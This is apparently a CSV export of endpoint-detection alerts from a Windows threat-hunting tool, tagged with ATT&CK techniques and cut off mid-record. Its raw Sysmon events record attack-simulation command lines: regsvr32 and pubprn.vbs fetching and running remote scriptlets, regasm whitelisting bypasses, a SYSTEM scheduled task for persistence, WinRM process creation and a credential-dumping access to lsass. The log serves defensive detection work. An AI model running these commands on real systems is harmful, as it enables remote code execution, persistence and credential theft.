/i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 32009 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-05-14 17:17:24.660 + ECAD0485-F2EC-5CDA-0000-0010F1631500 + 4092 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + insecurebank\Administrator + tcp + true + false + 10.59.4.20 + alice.insecurebank.local + 49584 + + false + 10.59.4.11 + DC1 + 389 + ldap + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 32008 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-05-14 17:17:24.597 + ECAD0485-F2EC-5CDA-0000-0010F1631500 + 4092 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + insecurebank\Administrator + tcp + true + false + 10.59.4.20 + alice.insecurebank.local + 49583 + + false + 10.59.4.11 + DC1 + 389 + ldap + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4929 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.204 + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4929 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.204 + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27334 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:01.724 + 747F3D96-B755-5EA4-0000-0010D06E2500 + 4484 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-3384-5EA5-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 596 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966368 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:48:33.279 + 365ABB72-55A1-5C91-0000-0010AB8C0700 + 2112 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4926 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:39.223 + 747F3D96-6633-5D3F-0000-001092628900 + 5056 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4925 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:39.152 + 747F3D96-6633-5D3F-0000-001051608900 + 4092 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5004 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:45.198 + 747F3D96-6675-5D3F-0000-0010AA498F00 + 4184 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5002 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-29 21:34:40.755 + 747F3D96-6670-5D3F-0000-0010F9148F00 + 7076 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-6670-5D3F-0000-001099048F00 + 2916 + C:\Windows\System32\cmd.exe + cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966330 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:42:38.043 + 365ABB72-543E-5C91-0000-001009C90300 + 3068 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 8341 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 07:23:00.883 + 365ABB72-F7C9-5CC7-0000-0010BF010E00 + 3772 + 1088 + D:\m.exe + 365ABB72-F6A1-5CC7-0000-001072590000 + 492 + C:\Windows\system32\lsass.exe + 0x1410 + C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5000 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:40.243 + 747F3D96-6670-5D3F-0000-001099048F00 + 2916 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4998 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:36.528 + 747F3D96-666C-5D3F-0000-00104BB78E00 + 3872 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + calc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6642-5D3F-0000-001044A68A00 + 2996 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4998 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:36.528 + 747F3D96-666C-5D3F-0000-00104BB78E00 + 3872 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + calc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6642-5D3F-0000-001044A68A00 + 2996 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.763 + 747F3D96-666B-5D3F-0000-0010EF858E00 + 264 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.763 + 747F3D96-666B-5D3F-0000-0010EF858E00 + 264 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4993 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.663 + 747F3D96-666B-5D3F-0000-00102F7F8E00 + 3224 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001051638E00 + 5840 + C:\Windows\System32\cmd.exe + cmd /c winrm qc -q + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 